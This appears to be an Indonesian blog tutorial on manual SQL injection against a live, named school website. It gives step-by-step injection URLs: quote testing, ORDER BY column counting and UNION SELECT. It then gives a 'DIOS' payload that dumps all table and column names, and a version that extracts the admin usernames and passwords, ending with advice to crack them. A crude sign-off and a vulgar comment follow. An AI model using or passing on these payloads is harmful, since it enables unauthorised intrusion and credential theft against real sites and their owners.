Tutor Sql Manual :)
Bahan-bahan:
Untuk pc: - Hackbar Mod (bisa di donwload Di sini)
Untuk Andro: - (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Bahan di andro itu adalah penggalan dios madblood dari hackbar mod
Karna gw disini lewat andro jadi lets play :*
Live Target :
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005
==================================================
Pertama kita cari vuln Sqlinya dlu contoh:
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005
Klo kita kasih tanda petik (')
Nanti akan error pagenya atau halaman pathnya jadi seperti ini
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005' <----
Ngerti kan??
Next step kita lakukan Order by sampai ketemu page yg error tapi sebelumnya kita kasih (order+by+1) dulu, bila pagenya kembali semula berarti bisa di katakan vuln contoh:
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005' order+by+1--+ (jangan lupa tambah kan kode '--+' di belakang order by nya)
Liat? Sudah kembali semula pagenya, berarti vuln. Step selanjutnya cari order by nya sampai dapet query yg error contoh
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005' order+by+1--+
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005' order+by+2--+
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005' order+by+3--+
Dan seterusnya sampai dapet query yg error :3
Di target gw query yg error berhenti di angka 7 contoh:
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=IN_0005'%20order+by+7--+
Kalian bisa liat di saat kita tambahkan angka 7 dia error, kesimpulannya kita akan gunakan angka yg tidak error berarti angka 6 yg bakal kita pakai buat union select all contoh :
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=-IN_0005'%20union+select+all+1,2,3,4,5,6--+
Seperti itu jadinya, oh iya sebelum kita union select all, jangan lupa kasih tanda (-) di depan (=) liat di atas, habis tuh keliatan tuh angka togelnya kata orang wkwkwk :v
Langsung aja kita dios madblood namanya, klo di hackbar biasa gk ada, tapi klo di hackbar mod ada :3
Contoh:
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=-IN_0005'%20union+select+all+1,2,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),4,5,6--+
Nah, pasti kalian bingung di mana tempat diosna ya wkwk :3
Gw kasih tau tempat diosnya adalah di angka togel tadi, bisa kalian liat di link sebelumnya saat kita union select all angka togel yaitu '3', jadi klo PC user bisa hapus angka '3' nya lalu exploit dios madblood, begitu pun ANDRO user :)
Klo udah keliatan username & password adminnya mari lanjut :3
Contoh:
http://alhikmahkajen.sch.id/index.php?tt=d_berita&p=-IN_0005'%20union+select+all+1,2,(Select+export_set(5,@:=0,(select+count(*)from(admin)where@:=export_set(5,export_set(5,@,username,0x3c6c693e,2),password,0xa3a,2)),@,2)),4,5,6--+
Taraaa keliatan username & password adminnya, oke gw jelasin caranya kalian tinggal ubah
(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
Information_schema.columns = admin, atau sesuai dios yg muncul nanti
Table_name = Username
Column_name = Password
Itu semua sesuai dengan dios yg muncul ya kawan kawan :)
Tinggal crack aja deh username & passwordnya :3
.:: Happy Inject & Keep Crotz ::.
Kontol
BalasHapus